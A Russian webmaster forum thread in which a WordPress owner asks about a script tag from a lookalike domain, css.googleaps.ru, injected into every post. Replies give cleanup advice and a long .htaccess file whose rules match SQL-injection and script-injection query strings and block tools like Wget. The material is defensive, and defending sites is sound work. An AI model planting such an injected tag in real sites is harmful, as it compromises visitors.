bozon 20 Posted November 23, 2016 Report Share Posted November 23, 2016 Подскажите что это за фигня такая, сегодня при редактировании текстов обнаружил что в КАЖДОЙ записи присутствует такой код <script src="//css.googleaps.ru/css?f=Open+Sans&cd=mb&ver=4.2.2"></script> проверка на вирусы ничего не дала, погуглил этот скрипт, вижу у многих такая проблема возникала, но толком никто не сказал что это за скрипт и как от него избавиться. Может кто-то из форумчан знает? Сегодня неожиданно обнаружил, что часть записей пропала с сайта, сделал бекап, записи восстановил и вновь почистил БД от этого скрипта, и сного записи пропали, тут явная связь, может не стоит удалять этот скрипт, хотя везде говорят что этот скрипт вредоносный, хоть и не говорят какой именно веред он несет. Может кто сталкивался с этим, как решить этоту проблему. Сайт на WP. Если тема создана в неподходящем разделе, прошу модераторов перенести в нужный раздел(не нашел на форуме раздела об уязвимостях) Заранее спасибо. Link to post Share on other sites
VIP vituson 675 Posted November 23, 2016 VIP Report Share Posted November 23, 2016 jms.in.ua/blog/52-udalyaem-vredonosnyj-kod-iz-wordpress Link to post Share on other sites
kuzovbmw 587 Posted November 23, 2016 Report Share Posted November 23, 2016 ну вообще код похож на вызов шрифтов гугла, только как то прописан странно, не, это не вирус Link to post Share on other sites
bozon 20 Posted November 23, 2016 Author Report Share Posted November 23, 2016 jms.in.ua/blog/52-udalyaem-vredonosnyj-kod-iz-wordpress Использовал рекомендации с этого сайта еще вчера, а сегодня пропала часть статей с сайта))) Link to post Share on other sites
VIP vituson 675 Posted November 23, 2016 VIP Report Share Posted November 23, 2016 Использовал рекомендации с этого сайта еще вчера, а сегодня пропала часть статей с сайта))) План действий: 1. Поменять пароли на хостинг, на FTP. 2. Восстановить бекап, поменять пароль на админку. 3. Поставить плагины защиты: vituson.ru/pochemu-vozrosla-nagruzka-na-server vituson.ru/nabor-plaginov-wordpress-dlya-zashhity-ot-xakerov 4. Удалить из записей бяку. Link to post Share on other sites
VIP vituson 675 Posted November 23, 2016 VIP Report Share Posted November 23, 2016 Плагины для защиты WP, которые ставлю на все свои сайты: Acunetix WP Security Anti-XSS attack belavir (php MD5) Disable XML-RPC Pingback Wordpress Firewall 2 "Плюс" закрываю админку по IP и редактирую файл htaccess: Содержание для файла .htaccess с блокировкой всякой дряни: Options +FollowSymLinks -Indexes<IfModule mod_headers.c> Header always append X-Frame-Options SAMEORIGIN</IfModule>Options +FollowSymLinksRewriteEngine OnRewriteCond %{QUERY_STRING} base64_encode[^(]*\([^)]*\) [OR]RewriteCond %{QUERY_STRING} (<|%3C)([^s]*s)+cript.*(>|%3E) [NC,OR]RewriteCond %{query_string} concat.*\( [NC,OR]RewriteCond %{query_string} union.*select.*\( [NC,OR]RewriteCond %{query_string} union.*all.*select [NC,OR]RewriteCond %{QUERY_STRING} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [OR]RewriteCond %{QUERY_STRING} _REQUEST(=|\[|\%[0-9A-Z]{0,2})RewriteRule ^(.*)$ index.php [F,L]RewriteRule .* - [E=HTTP_AUTHORIZATION:%{HTTP:Authorization}]RewriteCond %{REQUEST_URI} !^/index\.phpRewriteCond %{REQUEST_URI} /component/|(/[^.]*|\.(php|html?|feed|pdf|vcf|raw))$ [NC]RewriteCond %{REQUEST_FILENAME} !-fRewriteCond %{REQUEST_FILENAME} !-dRewriteRule .* index.php [L]<IfModule mod_deflate.c>AddOutputFilterByType DEFLATE text/html text/plain text/xml application/xml application/xhtml+xml text/javascript text/css application/x-javascriptBrowserMatch ^Mozilla/4 gzip-only-text/htmlBrowserMatch ^Mozilla/4.0[678] no-gzipBrowserMatch bMSIE !no-gzip !gzip-only-text/html<ifmodule mod_gzip.c>mod_gzip_on Yesmod_gzip_item_include file \.js$mod_gzip_item_include file \.css$ </ifmodule></IfModule>RewriteEngine onRewriteCond %{HTTP_REFERER} semalt\.com [NC,OR]RewriteCond %{HTTP_REFERER} success-seo\.com [NC,OR]RewriteCond %{HTTP_REFERER} best-seo-solution\.com [NC,OR]RewriteCond %{HTTP_REFERER} buttons-for-website\.com [NC,OR]RewriteCond %{HTTP_REFERER} buttons-for-your-website\.com [NC,OR]RewriteCond %{HTTP_REFERER} best-seo-offer\.com [NC,OR]RewriteCond %{HTTP_REFERER} rankings-analytics\.com [NC,OR]RewriteCond %{HTTP_USER_AGENT} .*MJ12bot.* [NC,OR]RewriteCond %{HTTP_USER_AGENT} Java [OR]RewriteCond %{HTTP_USER_AGENT} NjuiceBot [OR]RewriteCond %{HTTP_USER_AGENT} Gigabot [OR]RewriteCond %{HTTP_USER_AGENT} Baiduspider [OR]RewriteCond %{HTTP_USER_AGENT} JS-Kit [OR]RewriteCond %{HTTP_USER_AGENT} Voyager [OR]RewriteCond %{HTTP_USER_AGENT} PostRank [OR]RewriteCond %{HTTP_USER_AGENT} PycURL [OR]RewriteCond %{HTTP_USER_AGENT} Aport [OR]RewriteCond %{HTTP_USER_AGENT} DotBot [OR]RewriteCond %{HTTP_USER_AGENT} SurveyBot [OR]RewriteCond %{HTTP_USER_AGENT} larbin [OR]RewriteCond %{HTTP_USER_AGENT} Butterfly [OR]RewriteCond %{HTTP_USER_AGENT} libwww [OR]RewriteCond %{HTTP_USER_AGENT} Wget [OR]RewriteCond %{HTTP_USER_AGENT} SWeb [OR]RewriteCond %{HTTP_USER_AGENT} LinkExchanger [OR]RewriteCond %{HTTP_USER_AGENT} Soup [OR]RewriteCond %{HTTP_USER_AGENT} WordPress [OR]RewriteCond %{HTTP_USER_AGENT} spbot [OR]RewriteCond %{HTTP_USER_AGENT} MLBot [OR]RewriteCond %{HTTP_USER_AGENT} InternetSeer [OR]RewriteCond %{HTTP_USER_AGENT} FairShare [OR]RewriteCond %{HTTP_USER_AGENT} Yeti [OR]RewriteCond %{HTTP_USER_AGENT} Birubot [OR]RewriteCond %{HTTP_USER_AGENT} YottosBot [OR]RewriteCond %{HTTP_USER_AGENT} gold\ crawler [OR]RewriteCond %{HTTP_USER_AGENT} Linguee [OR]RewriteCond %{HTTP_USER_AGENT} Ezooms [OR]RewriteCond %{HTTP_USER_AGENT} lwp-trivial [OR]RewriteCond %{HTTP_USER_AGENT} Purebot [OR]RewriteCond %{HTTP_USER_AGENT} User-Agent [OR]RewriteCond %{HTTP_USER_AGENT} kmSearchBot [OR]RewriteCond %{HTTP_USER_AGENT} SiteBot [OR]RewriteCond %{HTTP_USER_AGENT} CamontSpider [OR]RewriteCond %{HTTP_USER_AGENT} ptd-crawler [OR]RewriteCond %{HTTP_USER_AGENT} HTTrack [OR]RewriteCond %{HTTP_USER_AGENT} suggybot [OR]RewriteCond %{HTTP_USER_AGENT} ttCrawler [OR]RewriteCond %{HTTP_USER_AGENT} Nutch [OR]RewriteCond %{HTTP_USER_AGENT} msnbot [OR]RewriteCond %{HTTP_USER_AGENT} msnbot-media [OR]RewriteCond %{HTTP_USER_AGENT} Slurp [OR]RewriteCond %{HTTP_USER_AGENT} ZeusRewriteRule ^(.*)$ – [F,L]<Files xmlrpc.php> Order Deny,Allow Deny from all</Files><files .htaccess>order allow,denydeny from all</files><files wp-config.php>order allow,denydeny from all</files>SetEnvIf user-agent "Indy Library" stayout=1SetEnvIf user-agent "libwww-perl" stayout=1SetEnvIf user-agent "Wget" stayout=1deny from env=stayout<IfModule mod_headers.c><FilesMatch "\.(js|css|xml|gz)$">Header append Vary: Accept-Encoding</FilesMatch></IfModule><IfModule mod_security.c><Files async-upload.php>SecFilterEngine OffSecFilterScanPOST Off</Files></IfModule><IfModule mod_security.c><Files upload.php>SecFilterEngine OffSecFilterScanPOST Off</Files></IfModule># BEGIN WordPress<IfModule mod_rewrite.c>RewriteEngine OnRewriteBase /RewriteRule ^index\.php$ - [L]RewriteCond %{REQUEST_FILENAME} !-fRewriteCond %{REQUEST_FILENAME} !-dRewriteRule . /index.php [L]</IfModule># END WordPress Link to post Share on other sites
bozon 20 Posted November 23, 2016 Author Report Share Posted November 23, 2016 План действий: 1. Поменять пароли на хостинг, на FTP. 2. Восстановить бекап, поменять пароль на админку. 3. Поставить плагины защиты: vituson.ru/pochemu-vozrosla-nagruzka-na-server vituson.ru/nabor-plaginov-wordpress-dlya-zashhity-ot-xakerov 4. Удалить из записей бяку. Пароли менял и на админ панель сайта, на админку хостинга, и на фтп, и бекап делал, и бяку чистил сначало вручную, потом надоело, вычистил из БД, а сегодня обнаружил что части статей на сайте нет( даже само количество статей, в "опубликованных" меньше, сделал бекап, статьи вернулись, вычистил бяку еще раз, статьи пропали. Вот сейчас думаю что делать дальше, по-любому бекап, но сначало нужно решить вопрос со скриптом, что это за байда такая? если действительно безобидная вещь, вроде вывода шрифтов гугла, как считают некоторые, то и хрен с ней, а если что-то серьезное, надо сначало с этим разобраться. Писал хостеру, он пишет что сам не в курсе и всю инфу по этому скрипту сам искал в инете.(реальный ответ хостера. SPRINTHOSTкстати) Link to post Share on other sites
vebster777 1 Posted November 23, 2016 Report Share Posted November 23, 2016 ну вообще код похож на вызов шрифтов гугла, только как то прописан странно, не, это не вирус в том то и дело, что похож, это как раз таки очень похоже на вирус, смотрим домен css.googleaps.ru , хоть раз такой видели у гугла ? Link to post Share on other sites
VIP seo-net 2346 Posted November 23, 2016 VIP Report Share Posted November 23, 2016 хотел попробовать открыть этот подозрительный сайт, отдает ошибку 403 Link to post Share on other sites
vebster777 1 Posted November 23, 2016 Report Share Posted November 23, 2016 Пароли менял и на админ панель сайта, на админку хостинга, и на фтп, и бекап делал, и бяку чистил сначало вручную, потом надоело, вычистил из БД, а сегодня обнаружил что части статей на сайте нет( даже само количество статей, в "опубликованных" меньше, сделал бекап, статьи вернулись, вычистил бяку еще раз, статьи пропали. Вот сейчас думаю что делать дальше, по-любому бекап, но сначало нужно решить вопрос со скриптом, что это за байда такая? если действительно безобидная вещь, вроде вывода шрифтов гугла, как считают некоторые, то и хрен с ней, а если что-то серьезное, надо сначало с этим разобраться. Писал хостеру, он пишет что сам не в курсе и всю инфу по этому скрипту сам искал в инете.(реальный ответ хостера. SPRINTHOSTкстати) анализируйте access и error логи по вашему сайту, смотрите через какие файлы получили доступ, возможно где-то не правильно выставлены права Link to post Share on other sites
bozon 20 Posted November 23, 2016 Author Report Share Posted November 23, 2016 анализируйте access и error логи по вашему сайту, смотрите через какие файлы получили доступ, возможно где-то не правильно выставлены права По этому поводу хостер говорит что этот скрипт проник через уязвимость в WP версии ранее 4.2.1(в 4.2.1. дыру закрыли, у меня стоит версия 4.6.1) Link to post Share on other sites
bozon 20 Posted November 23, 2016 Author Report Share Posted November 23, 2016 Погуглил еще немного и нашел вот что levelit(.точка.)ru/zapis-razgovora-asterisk/ понятия не имею как это могло попасть на сайт. Link to post Share on other sites
VIP Tobol 141 Posted November 24, 2016 VIP Report Share Posted November 24, 2016 Как по мне, так это похоже на ссылку на загрузку внешнего шрифта. А вирусы скорее всего появляются от использования варезных шаблонов и компонентов (хотя может в вашем случае это не так) Link to post Share on other sites
bozon 20 Posted November 24, 2016 Author Report Share Posted November 24, 2016 Как по мне, так это похоже на ссылку на загрузку внешнего шрифта. А вирусы скорее всего появляются от использования варезных шаблонов и компонентов (хотя может в вашем случае это не так) Фиг его знает что это такое, особых проблем он не доставлял, с помощью хостера удалил эту фигню из БД, подожду недельку посмотрим что получиться, пока что единственным положительным эффектом стало небольшое увеличение скорости загрузки страниц. Link to post Share on other sites
siteup 4 Posted November 24, 2016 Report Share Posted November 24, 2016 В случае заражения WP мы делаем так: 1. Меняем все пароли (панель хостинга, FTP, БД, админка) на сложные 2. Сносим весь WP за исключением папки wp-content и файла wp-config 3. Распаковываем скачанную с оф. сайта последнюю версию WP, предварительно удалив из дистрибутива папку wp-content 4. Меняем путь к админке (можно нагуглить, как) 5. Прогоняем проверку с помощью скрипта ai-bolit в режиме "параноидальный" Так же добавлю, что уязвимости в ВП в основном своем со стороны плагинов. Практически всегда это плагин от каких-то непонятных деятелей. Link to post Share on other sites
Recommended Posts
Please sign in to comment
You will be able to leave a comment after signing in
Sign In Now